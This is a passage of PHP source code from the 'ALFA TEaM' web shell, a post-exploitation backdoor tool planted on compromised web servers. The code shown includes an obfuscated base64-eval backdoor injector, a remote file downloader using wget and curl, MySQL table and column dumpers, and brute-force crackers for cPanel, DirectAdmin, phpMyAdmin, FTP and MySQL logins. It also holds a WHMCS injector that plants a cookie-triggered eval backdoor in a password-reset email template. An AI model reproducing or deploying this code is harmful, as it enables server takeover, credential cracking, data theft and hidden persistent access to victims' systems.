\");\nif($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa4']!=''){\n$method = $_POST['alfa2'];\n$file = $_POST['alfa3'];\n$shell = $_POST['alfa4'];\n$key = str_replace(array('\"','\\''),'',trim($_POST['alfa5']));\nif($key=='')$key='alfa';\nif($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}\n$code = '\\'.base\".\"64\".\"_dec\".\"ode(\\$c));\");$x(\"'.$shell.'\");exit;}?>';\nif(@is_file($file)&&@is_writable($file)){@file_put_contents($file,$code.\"\\n\".@file_get_contents($file));__alert($success.\"
Run With: \".basename($file).\"?alfa=\".$key.'');}else{__alert($error);}}}\nif($_POST['alfa1']=='db'){\necho(\"
| In DataBase |
\".getConfigHtml('all').\"
\");\n$table = array('td1' =>\narray('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),\n'td2' =>\narray('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),\n'td3' =>\narray('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),\n'td4' =>\narray('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),\n'td5' =>\narray('color' => 'FFFFFF', 'tdName' => 'Backdoor Loader: ', 'inputName' => 'file', 'inputValue' => $cwd, 'inputSize' => '50', 'placeholder' => true),\n'td6' =>\narray('color' => 'FFFFFF', 'tdName' => 'Key: ', 'inputName' => 'key', 'inputValue' => 'alfa', 'inputSize' => '50')\n);\ncreate_table($table);\necho(\"
{$select}
\");\necho($textarea);\necho(\"
\");\nif($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa5']!=''&&$_POST['alfa6']!=''){\n$dbhost = $_POST['alfa2'];\n$dbuser = $_POST['alfa3'];\n$dbpw = $_POST['alfa4'];\n$dbname = $_POST['alfa5'];\n$file = $_POST['alfa6'];\n$method = $_POST['alfa7'];\n$shell = $_POST['alfa8'];\n$key = str_replace(array('\"','\\''),'',trim($_POST['alfa9']));\nif($key=='')$key='alfa';\nif($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}\nif($conn = mysqli_connect($dbhost,$dbuser,$dbpw,$dbname)){\n$code = '\\'.base\".\"64\".\"_dec\".\"ode(\\$c));\");$x($r[\"code\"]);exit;}?>';\nif(@is_file($file)&&@is_writable($file)){\n@mysqli_query($conn,'DROP TABLE `alfa_bc`');\n@mysqli_query($conn,'CREATE TABLE `alfa_bc` (code LONGTEXT)');\n@mysqli_query($conn,'INSERT INTO `alfa_bc` VALUES(\"'.$shell.'\")');\n@file_put_contents($file,$code.\"\\n\".@file_get_contents($file));\n__alert($success.\"
Run With: \".basename($file).\"?alfa=\".$key.'');}else{__alert($error);}}}}\necho('
');\nalfafooter();\n}\nfunction alfawhois(){\necho(\"
| Whois |
>');return false;\\\">
Url: 
  
\");\nif($_POST['alfa2']=='>>'&&!empty($_POST['alfa1'])){\n$site = str_replace(array('http://','https://','www.','ftp://'),'',$_POST['alfa1']);\n$target = 'http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain='.$site;\n$data = @file_get_contents($target);\nif($data==''){$get = new AlfaCURL();$get->ssl = true;$data = $get->Send($target);}\n$target = @json_decode($data,true);\necho __pre();\nif(is_array($target)){echo($target[\"whois_raw\"]);}else{echo alfaEx(\"whois \".$site);}}\necho(\"
\");\n}\nfunction alfaremotedl(){\nalfahead();\necho(\"
| Upload From Url |
\n
>');return false;\\\">\n
Url: 
   
\n
Path:
 
\n
\");\nif(isset($_POST['alfa1'],$_POST['alfa2'],$_POST['alfa3'])&&!empty($_POST['alfa1'])&&$_POST['alfa3']=='>>'){\necho __pre();\n$url = $_POST['alfa1'];\n$path = $_POST['alfa2'];\necho('
');\nif(__download($url,$path)){\necho('Success...!');\n}else{\necho('Error...!');\n}\necho('
');\n}\necho(\"
\");\nalfafooter();\n}\nfunction __download($url,$path=false){\nif(!preg_match(\"/[a-z]+:\\/\\/.+/\",$url)) return false;\n$saveas = basename(rawurldecode($url));\nif($path){$saveas=$path.$saveas;}\nif($content = __read_file($url)){\nif(@is_file($saveas))@unlink($saveas);\nif(__write_file($saveas, $content)){return true;}}\n$buff = alfaEx(\"wget \".$url.\" -O \".$saveas);\nif(@is_file($saveas)) return true;\n$buff = alfaEx(\"curl \".$url.\" -o \".$saveas);\nif(@is_file($saveas)) return true;\n$buff = alfaEx(\"lwp-download \".$url.\" \".$saveas);\nif(@is_file($saveas)) return true;\n$buff = alfaEx(\"lynx -source \".$url.\" > \".$saveas);\nif(@is_file($saveas)) return true;\n$buff = alfaEx(\"GET \".$url.\" > \".$saveas);\nif(@is_file($saveas)) return true;\n$buff = alfaEx(\"links -source \".$url.\" > \".$saveas);\nif(@is_file($saveas)) return true;\n$buff = alfaEx(\"fetch -o \".$saveas.\" -p \".$url);\nif(@is_file($saveas)) return true;\nreturn false;\n}\nfunction clean_string($string){\n  if(function_exists(\"iconv\")){\n\t  $s = trim($string);\n\t  $s = iconv(\"UTF-8\", \"UTF-8//IGNORE\", $s);\n  }\n  return $s;\n}\nfunction __read_file($file, $boom = true){\n$content = false;\nif($fh = @fopen($file, \"rb\")){\n$content = \"\";\nwhile(!feof($fh)){\n$content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);\n}\n@fclose($fh);\n}\nif(empty($content)||!$content){\n\t$content = alfaEx(\"cat '\".addslashes($file).\"'\");\n}\nreturn $content;\n}\nfunction alfaMarket(){\necho \"
\";\n$curl = new AlfaCURL();\n$content = $curl->Send(\"http://solevisible.com/market.php\");\n$data = @json_decode($content, true);\nif(!empty($data)){\nif($data[\"status\"] == \"open\"){\n\techo $data[\"content\"];\n}else{\n\techo $data[\"error_msg\"];\n}\n}else{\n\techo \"
Cant connect to the alfa market....! try later.
\";\n}\necho \"
\";\n}\nfunction alfaSettings(){\nalfahead();\nAlfaNum(6,7,8,9,10);\necho '
| Settings |
| Generall Setting | 
';\nif($_POST[\"alfa8\"] == \"main\"){\necho '
| Settings |
';\n$lg_array = array('0'=>'No','1'=>'Yes');\n$penc_array = array('false'=>'No','true'=>'Yes');\n$protect_html = \"\";\n$icon_html = \"\";\n$postEnc_html = \"\";\n$login_html = \"\";\n$cgiapi_html = \"\";\nforeach($lg_array as $key=>$val)$protect_html .= '';\nforeach($lg_array as $key=>$val)$icon_html .= '';\nforeach($penc_array as $key=>$val)$cgiapi_html .= '';\nforeach($penc_array as $key=>$val)$postEnc_html .= '';\n$lg_array = array(\"gui\"=>\"GUI\",\"500\"=>\"500 Internal Server Error\",\"403\"=>\"403 Forbidden\",\"404\"=>\"404 NotFound\");\nforeach($lg_array as $key=>$val)$login_html .= '';\necho '';\necho '
Protect:
Cgi Api:
Post Encryption:
Show Icons:
login Page:
UserName:
Password:
';\nif($_POST['alfa5']=='>>'){\necho __pre();\nif(!empty($_POST['alfa3'])){\n$protect = $_POST['alfa1'];\n$lgpage = $_POST['alfa2'];\n$username = $_POST['alfa3'];\n$password = md5($_POST['alfa4']);\n$icon = $_POST['alfa6'];\n$post_encrypt = $_POST['alfa7'];\n$cgi_api_val = $_POST['alfa9'];\n@chdir($GLOBALS['home_cwd']);\n$basename = @basename($_SERVER['PHP_SELF']);\n$data = @file_get_contents($basename);\n$user_rand = $GLOBALS[\"DB_NAME\"][\"user_rand\"];\n$pass_rand = $GLOBALS[\"DB_NAME\"][\"pass_rand\"];\n$login_page_rand = $GLOBALS[\"DB_NAME\"][\"login_page_rand\"];\n$safemode_rand = $GLOBALS[\"DB_NAME\"][\"safemode_rand\"];\n$show_icons_rand = $GLOBALS[\"DB_NAME\"][\"show_icons_rand\"];\n$post_encryption_rand = $GLOBALS[\"DB_NAME\"][\"post_encryption_rand\"];\n$cgi_api_rand = $GLOBALS[\"DB_NAME\"][\"cgi_api_rand\"];\n$find_user = '/\\''.$user_rand.'\\'(.*?),/i';\n$find_pw = '/\\''.$pass_rand.'\\'(.*?),/i';\n$find_lg = '/\\''.$login_page_rand.'\\'(.*?),/i';\n$find_p = '/\\''.$safemode_rand.'\\'(.*?),/i';\n$icons = '/\\''.$show_icons_rand.'\\'(.*?),/i';\n$postEnc = '/\\''.$post_encryption_rand.'\\'(.*?),/i';\n$cgi_api_reg = '/\\''.$cgi_api_rand.'\\'(.*?),/i';\nif(!empty($username)&&preg_match($find_user,$data,$e)){\n$new = '\\''.$user_rand.'\\' => \\''.$username.'\\',';\n$data = str_replace($e[0],$new,$data);\n}\nif(!empty($_POST['alfa4'])&&preg_match($find_pw,$data,$e)){\n$new = '\\''.$pass_rand.'\\' => \\''.$password.'\\',';\n$data = str_replace($e[0],$new,$data);\n}\nif(!empty($lgpage)&&preg_match($find_lg,$data,$e)){\n$new = '\\''.$login_page_rand.'\\' => \\''.$lgpage.'\\',';\n$data = str_replace($e[0],$new,$data);\n}\nif(!empty($find_p)&&preg_match($find_p,$data,$e)){\n$new = '\\''.$safemode_rand.'\\' => \\''.$protect.'\\',';\n$data = str_replace($e[0],$new,$data);\n}\nif(preg_match($icons,$data,$e)){\n$new = '\\''.$show_icons_rand.'\\' => \\''.$icon.'\\',';\n$data = str_replace($e[0],$new,$data);\n}\nif(preg_match($postEnc,$data,$e)){\n$new = '\\''.$post_encryption_rand.'\\' => '.$post_encrypt.',';\n$data = str_replace($e[0],$new,$data);\n}\nif(preg_match($cgi_api_reg,$data,$e)){\n$new = '\\''.$cgi_api_rand.'\\' => '.$cgi_api_val.',';\n$data = str_replace($e[0],$new,$data);\n}\nif(@file_put_contents($basename,$data)){\necho 'UserName: '.$username.'
Password: '.$_POST['alfa4'].'';\n}else{\n__alert(\"File has no edit access...!\");\n}\n}else{\n__alert(\"UserName is Empty !\");\n}\n}\n}elseif($_POST[\"alfa8\"] == \"color\"){\necho('
| Custom Color |
');\necho '';\n$template = '';\n$x = 1;\nforeach($GLOBALS['__ALFA_COLOR__'] as $key => $value){\n\t$multi = \"\";\n\tif(is_array($value)){\n\t\tif(isset($value[\"multi_selector\"])){\n\t\t\t$multi = __ZW5jb2Rlcg(json_encode($value));\n\t\t}\n\t}\n\t$value = alfa_getColor($key);\n\t$help = strtolower(str_replace(array(\":\", \"+\"), array(\"_\", \"_plus\"), $key));\n\techo str_replace(array(\"{index}\", \"{target}\", \"{color}\", \"{multi}\", \"{help}\"), array($x++, $key, $value, $multi, $help), $template);\n}\necho '';\n\necho '
Help
{index}
{target}:
-
*
Use Default Color:
 
';\nif($_POST['alfa7']=='export'){\n\techo __pre();\n\t$colors = is_array($GLOBALS[\"DB_NAME\"][\"color\"])?$GLOBALS[\"DB_NAME\"][\"color\"]:array();\n\t$glob_colors = $GLOBALS[\"__ALFA_COLOR__\"];\n\t$array = array();\n\tforeach($glob_colors as $k => $v){\n\t\tif(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){\n\t\t\t$v = trim($colors[$k]);\n\t\t}else{\n\t\t\t$v = trim(is_array($v)?$v[\"key_color\"]:$v);\n\t\t}\n\t\t$array[$k] = $v;\n\t}\n\t$file = \"alfa_color_config_\".date('Y-m-d-h_i_s').\".conf\";\n\t$config = json_encode($array, JSON_PRETTY_PRINT);\n\tif(!@file_put_contents($file, $config)){\n\t\techo('
Color Config:

');\n\t}else{\n\t\techo('
Download Config
');\n\t}\n}\nif($_POST['alfa2']=='>>'){\n\techo __pre();\n\t$colors = json_decode($_POST[\"alfa1\"],true);\n\t$array = \"\";\n\t$is_default = isset($_POST[\"alfa3\"])&&$_POST[\"alfa3\"]==\"1\"?true:false;\n\t$glob_colors = $GLOBALS[\"__ALFA_COLOR__\"];\n\tforeach($glob_colors as $k => $v){\n\t\tif(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){\n\t\t\t$v = trim($colors[$k]);\n\t\t}else{\n\t\t\t$v = trim(is_array($v)?$v[\"key_color\"]:$v);\n\t\t}\n\t\t$array .= '\"'.trim($k).'\" => \"'.$v.'\",';\n\t}\n\t@chdir($GLOBALS['home_cwd']);\n\t$basename = @basename($_SERVER['PHP_SELF']);\n\t$data = @file_get_contents($basename);\n\t$color = '/\\'color\\'(.*?)\\),/s';\n\tif(preg_match($color,$data,$e)){\n\t\t$new = \"'color' => array(\".$array.\"),\";\n\t\t$data = str_replace($e[0],$new,$data);\n\t\tif(@file_put_contents($basename, $data)){\n\t\t\techo(\"
[+] Success...
\");\n\t\t}else{\n\t\t\techo(\"
[-] We Not have permission to Edit shell...!
\");\n\t\t}\n\t}else{\n\t\techo(\"
[-] Error...!
\");\n\t}\n}\n}\necho('
');\nalfafooter();\n}\nfunction alfaaboutus(){\nalfahead();\necho '
';\n$news = new AlfaCURL();\n$about_us = $news->Send(\"http://solevisible.com/aboutus.php\");\nif(empty($about_us)){\n$about_us = \"

\n☮ ~ PEACE ~ ☮
\nShell Coded By Sole Sad & Invisible (ALFA TEaM)
\nContact : [email protected]
\nTelegram Channel: @solevisible
\nSkype : ehsan.invisible
\nSkype : sole.sad
\nPersian Gulf For Ever
\nIranian Programmers
\n############
\n
\";\n}\necho __pre().$about_us;\necho('
');\nalfafooter();\n}\nfunction alfacoldumper(){\nalfahead();\necho('
');\nAlfaNum(8,9,10);\necho \"

| Mysql Column Dumper |


\".getConfigHtml('all').\"
\";\n$delimiter = (!empty($_POST['alfa1']) ? $_POST['alfa1'] : '::');\n$selected_data = json_decode($_POST['alfa2'], true);\n$username = ($_POST['alfa3']);\n$password = ($_POST['alfa4']);\n$dbname = ($_POST['alfa5']);\n$dfile = ($_POST['alfa6']);\n$host = ($_POST['alfa7']);\n$table = array('td1' =>\n array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => $host, 'inputSize' => '50'),\n 'td2' =>\n array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => $username, 'inputSize' => '50'),\n 'td3' =>\n array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => $password, 'inputSize' => '50'),\n 'td4' =>\n array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => $dbname, 'inputSize' => '50'),\n 'td5' =>\n array('color' => 'FFFFFF', 'tdName' => 'Output Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']), 'inputSize' => '50')\n);\ncreate_table($table);\necho \"
\";\n$db = false;\nif(!empty($dbname)){\n\t$db = @mysqli_connect($host, $username, $password, $dbname);\n}\nif(count($selected_data) > 0){\n\tif($db){\n\t\tif(!is_dir($dfile)){\n\t\t\t$dfile = $GLOBALS['cwd'];\n\t\t}\n\t\t$tbls = \"\";\n\t\t$ext = '.txt';\n\t\tif($delimiter == 'json'){\n\t\t\t$ext = '.json';\n\t\t}\n\t\tforeach ($selected_data as $tbl => $cols) {\n\t\t\t$tables_query = mysqli_query($db, \"SELECT \".implode(',', $cols).\" FROM $tbl\");\n\t\t\t$file_name = $dfile.'/'.$dbname.'.'.$tbl.$ext;\n\t\t\t$fp = fopen($file_name, \"w\");\n\t\t\t$data = array();\n\t\t\twhile($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)){\n\t\t\t\tif($delimiter == \"json\"){\n\t\t\t\t\t$col_arr = array();\n\t\t\t\t\tforeach ($row as $key => $value) {\n\t\t\t\t\t\tif(empty($value)){\n\t\t\t\t\t\t\t$value = \"[empty]\";\n\t\t\t\t\t\t}\n\t\t\t\t\t\t $col_arr[$key] = $value;\n\t\t\t\t\t}\n\t\t\t\t\t$data[$tbl][] = $col_arr;\n\t\t\t\t}else{\n\t\t\t\t\t$data = \"\";\n\t\t\t\t\tforeach ($row as $key => $value) {\n\t\t\t\t\t\tif(empty($value)){\n\t\t\t\t\t\t\t$value = \"[empty]\";\n\t\t\t\t\t\t}\n\t\t\t\t\t\t$data .= $value . $delimiter;\n\t\t\t\t\t}\n\t\t\t\t\tfwrite($fp, $data .\"\\n\");\n\t\t\t\t}\n\t\t\t}\n\t\t\tif($delimiter == \"json\"){\n\t\t\t\tfwrite($fp, json_encode($data));\n\t\t\t}\n\t\t\tfclose($fp);\n\t\t\t$tbls .= \"Done ~~~> \".$file_name.\"
\";\n\t\t}\n\t\techo __pre();\n\t\techo \"
\".$tbls.\"
\";\n\t}\n}\nif(!empty($dbname) && count($selected_data) == 0){\n//echo __pre();\nif($db){\n\techo(\"
[ Select your tables and columns for dumping data ]
\");\n\techo(\"
Output Type: 
 Delimiter: 
\");\n\t$data = array();\n\t$tables_query = mysqli_query($db, \"SELECT table_name FROM information_schema.tables WHERE table_schema = database();\");\n\twhile($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)){\n\t\t$data[$row[\"table_name\"]] = array();\n\t\t$table_count_q = mysqli_query($db, \"SELECT count(*) FROM `\".$row['table_name'].\"`\");\n\t\t$table_count = mysqli_fetch_row($table_count_q);\n\t\t$data[$row[\"table_name\"]][\"data_count\"] = $table_count[0];\n\t\t$columns_query = mysqli_query($db, \"SELECT column_name FROM information_schema.columns WHERE table_name = '\".$row['table_name'].\"'\");\n\t\twhile($row2 = mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){\n\t\t\t$data[$row[\"table_name\"]][\"cols\"][] = $row2[\"column_name\"];\n\t\t}\n\t}\n\tmysqli_close($db);\n\n\techo '
    ';\n\tforeach($data as $tbl => $cols){\n\t    echo '
  • '.$tbl.' ('.$cols[\"data_count\"].')
      ';\n\t    foreach($cols[\"cols\"] as $col){\n\t        echo '
    • ' . $col . '
      • ';\n\t    }\n\t    echo '
    • ';\n\t}\n\techo '
';\n}else{\necho('
mysqli_connect : Error!
');\n}\n}\necho('
');\nalfafooter();\n}\nfunction alfaDumper(){\nalfahead();\necho('
');\nAlfaNum(8,9,10);\necho \"

| Mysql Database Dumper |


\".getConfigHtml('all').\"
\";\n$table = array('td1' =>\n array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),\n 'td2' =>\n array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),\n 'td3' =>\n array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),\n 'td4' =>\n array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),\n 'td5' =>\n array('color' => 'FFFFFF', 'tdName' => 'Dump Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']).'alfa.sql', 'inputSize' => '50')\n);\ncreate_table($table);\necho \"
\";\n$username = ($_POST['alfa3']);\n$password = ($_POST['alfa4']);\n$dbname = ($_POST['alfa5']);\n$dfile = ($_POST['alfa6']);\n$host = ($_POST['alfa7']);\nif(!empty($dbname)){\necho __pre();\n$msg = \"
Check this :  \".$dfile.\"
\";\nif(@mysqli_connect($host,$username,$password,$dbname)){\nif(strlen(alfaEx(\"mysqldump\"))>0){\nalfaEx(\"mysqldump --single-transaction --host=\\\"$host\\\" --user=\\\"$username\\\" --password=\\\"$password\\\" $dbname > '\".addslashes($dfile).\"'\");\necho($msg);\n}else{\n__alert(\"Error...!\");\n}\n}else{\necho('
mysqli_connect : Error!
');\n}\n}\necho('
');\nalfafooter();\n}\nfunction Alfa_DirectAdmin_Cracker($info){\nif(!$info['mysql'])\n$url = $info['protocol'].$info['target'].':'.$info['port'].'/CMD_LOGIN';\nelse $url = $info['protocol'].$info['target'].'/phpmyadmin';\n$curl = curl_init();\ncurl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);\ncurl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');\ncurl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);\ncurl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);\ncurl_setopt($curl, CURLOPT_HEADER,0);\ncurl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);\ncurl_setopt($curl, CURLOPT_URL,$url);\ncurl_setopt($curl, CURLOPT_USERPWD, $info['username'].':'.$info['password']);\nif($info['mysql'])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);\n$result = @curl_exec($curl);\n$curl_errno = curl_errno($curl);\n$curl_error = curl_error($curl);\nif ($curl_errno > 0) {echo \"Error: $curl_error
\";}\nelseif(preg_match('/CMD_FILE_MANAGER|frameset/i',$result)){\necho 'UserName: '.$info['username'].' PassWord: '.$info['password'].'  Login Success....
';\n$info['target'] = $url;\nCrackerResualt($info);\n}\ncurl_close($curl);\n}\nfunction Alfa_CP_Cracker($info){\n$url = $info['protocol'].$info['target'].':'.$info['port'];\n$curl = curl_init();\ncurl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);\ncurl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');\ncurl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);\ncurl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);\ncurl_setopt($curl, CURLOPT_HEADER,0);\ncurl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\ncurl_setopt($curl, CURLOPT_HTTPHEADER, array(\"Authorization: Basic \" . __ZW5jb2Rlcg($info['username'].\":\".$info['password']) . \"\\n\\r\"));\ncurl_setopt($curl, CURLOPT_URL, $url);\n$result = @curl_exec($curl);\n$curl_errno = curl_errno($curl);\n$curl_error = curl_error($curl);\nif ($curl_errno > 0) {echo \"Error: $curl_error
\";}\nelseif(preg_match('/filemanager/i',$result)){\necho 'UserName: '.$info['username'].' PassWord: '.$info['password'].'  Login Success....
';\n$info['target'] = $url;\nCrackerResualt($info);\n}\ncurl_close($curl);\n}\nfunction Alfa_FTP_Cracker($info){\n$url = $info['protocol'].$info['target'];\n$curl = curl_init();\ncurl_setopt($curl, CURLOPT_URL, $url);\ncurl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');\ncurl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);\ncurl_setopt($curl, CURLOPT_USERPWD, \"\".$info['username'].\":\".$info['password'].\"\");\n$result = @curl_exec($curl);\n$curl_errno = curl_errno($curl);\n$curl_error = curl_error($curl);\nif ($curl_errno > 0) {echo \"Error: $curl_error
\";}\nelseif(preg_match('/(\\d+):(\\d+)/i',$result)){\necho 'UserName: '.$info['username'].' PassWord: '.$info['password'].'  Login Success....
';\n$info['target'] = $url;\nCrackerResualt($info);\n}\ncurl_close($curl);\n}\nfunction Alfa_Mysql_Cracker($info){\nif(@mysqli_connect($info['target'].':'.$info['port'],$info['username'],$info['password'])){\nCrackerResualt($info);\necho 'UserName: '.$info['username'].' PassWord: '.$info['password'].'  Login Success....
';\n}\n}\nfunction Alfa_FTPC($info){\nif($con=@ftp_connect($info['target'],$info['port'])){\nif($con){\n$login=@ftp_login($con,$info['username'],$info['password']);\nif($login){CrackerResualt($info);}}}\n@ftp_close($con);\n}\nfunction CrackerResualt($info){\n$res = $info['target'].' => '.$info['username'].\":\".$info['password'].\"\\n\" ;\n$c = @fopen($info['fcrack'],'a+');\n@fwrite($c, $res);\n@fclose($c);\n}\nfunction Alfa_Call_Function_Cracker($method,$info){\nswitch($method){case 'cp':return Alfa_CP_Cracker($info);break;case 'direct': case 'phpmyadmin':return Alfa_DirectAdmin_Cracker($info);break;case 'ftp':return Alfa_FTP_Cracker($info);break;case 'mysql':return Alfa_Mysql_Cracker($info);break;case 'mysql':return Alfa_FTPC($info);break;}\n}\nfunction alfaCrackers(){\nalfahead();\nAlfaNum(9,10);\necho '

| Brute Forcer |


Login Page:  Protocol:  Website/ip Address: \nPort: \n
Users ListPasswords
\n\n  

\nSave Result Into File \n
';\n$target = str_replace(array('https://','http://','ftp://'),'',$_POST['alfa1']);\n$port = $_POST['alfa2'];\n$usernames= $_POST['alfa3'];\n$passwords = $_POST['alfa4'];\n$fcrack = $_POST['alfa5'];\n$cracking = $_POST['alfa6'];\n$protocol = $_POST['alfa7'];\n$loginpanel = $_POST['alfa8'];\n$p = $loginpanel == 'phpmyadmin' ? $p = true : false;\nif($cracking=='start'){\necho __pre();\n$exuser = explode(\"\\n\",$usernames);\n$expw = explode(\"\\n\",$passwords);\nforeach($exuser as $user){\nforeach($expw as $pw){\n$array = array('username' => trim($user),'password' => trim($pw),'port' => trim($port),'target' => trim($target),'protocol' => trim($protocol),'fcrack' => trim($fcrack),'mysql' => $p);\nAlfa_Call_Function_Cracker($loginpanel,$array);\n}\n}\necho '
Attack Finished...';\n}\necho '
';\nalfafooter();\n}\nfunction output($string){ echo \"

Click Here !


\";}\nfunction alfaShellInjectors(){\nalfahead();\necho '
';\nAlfaNum(11);\necho '
| Cms Shell Injector |
| WHMCS | | MyBB | | vBulletin |
';\n$selector = '
Shell Inject Method : 
 
';\nif(isset($_POST['alfa1']) && $_POST['alfa1']== 'whmcs'){\nAlfaNum();\necho __pre().\"
| WHMCS |
\".getConfigHtml('whmcs').\"
\";\n$table = array('td1' =>\n array('color' => 'FFFFFF', 'tdName' => 'Path WHMCS Url : ', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),\n 'td2' =>\n array('color' => 'FFFFFF', 'tdName' => 'Mysql Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),\n 'td3' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),\n 'td4' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db User : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),\n 'td5' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db Pass : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')\n);\ncreate_table($table);\necho $selector;\necho \"
\";\nif(isset($_POST['alfa6'])) {\n$dbu = $_POST['alfa6'];\n$dbn = $_POST['alfa7'];\n$dbp = $_POST['alfa8'];\n$dbh = $_POST['alfa9'];\n$path = $_POST['alfa10'];\n$method = $_POST['alfa4'];\n$index = \"{php}\".ALFA_UPLOADER.\";{/php}\";\n$newin = str_replace(\"'\",\"\\'\",$index);\n$newindex = \"
Dear $newin,
Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.
To reset your password, please visit the url below:
{\\$pw_reset_url}
When you visit the link above, your password will be reset, and the new password will be emailed to you.
{\\$signature}
{php}if(\\$_COOKIE[\\\"sec\\\"] == \\\"123\\\"){eval(base64_decode(\\$_COOKIE[\\\"sec2\\\"])); die(\\\"!\\\");}{\\/php}\";\nif(!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)){\nif(filter_var($path,FILTER_VALIDATE_URL)){\n$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_connect_error());\n$soleSave= mysqli_query($conn,\"select message from tblemailtemplates where name='Password Reset Validation'\");\n$soleGet = mysqli_fetch_assoc($soleSave);\n$tempSave1 = $soleGet['message'];\n$tempSave = str_replace(\"'\",\"\\'\",$tempSave1);\nmysqli_query($conn,\"UPDATE tblconfiguration SET value = '1' WHERE setting = 'AllowSmartyPhpTags'\") or die (mysqli_error($conn));\n$inject = \"UPDATE tblemailtemplates SET message='$newindex' WHERE name='Password Reset Validation'\";\n$result = mysqli_query($conn,$inject) or die (mysqli_error($conn));\n$create = \"insert into tblclients (email) values('[email protected]')\";\n$result2 = mysqli_query($conn,$create) or die (mysqli_error($conn));\nif(function_exists('curl_version') && $method == 'auto'){\n$AlfaSole = new AlfaCURL(true);\n$saveurl = $AlfaSole->Send($path.\"/pwreset.php\");\n$getToken = preg_match(\"/name=\\\"token\\\" value=\\\"(.*?)\\\"/i\",$saveurl,$token);\n$AlfaSole->Send($path.\"/pwreset.php\",\"post\",\"token={$token[1]}[email protected]\");\n$backdata = \"UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'\";\n$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));\n__alert(\"shell injectet...\");\n$ff= 'http://'.$path.\"/solevisible.php\";\noutput($ff);}else{\necho \"

Please go to Target => \".$path.\"/pwreset.php
 And Reset Password With Email => [email protected]
And Go To => \".$path.\"/solevisible.php


\";}}else{__alert('Path is not Valid...');}}}\n}if(isset($_POST['alfa2']) && $_POST['alfa2']== 'mybb'){\nAlfaNum(1,2,3,5);\necho __pre().\"
| MyBB |
\".getConfigHtml(\"mybb\").\"
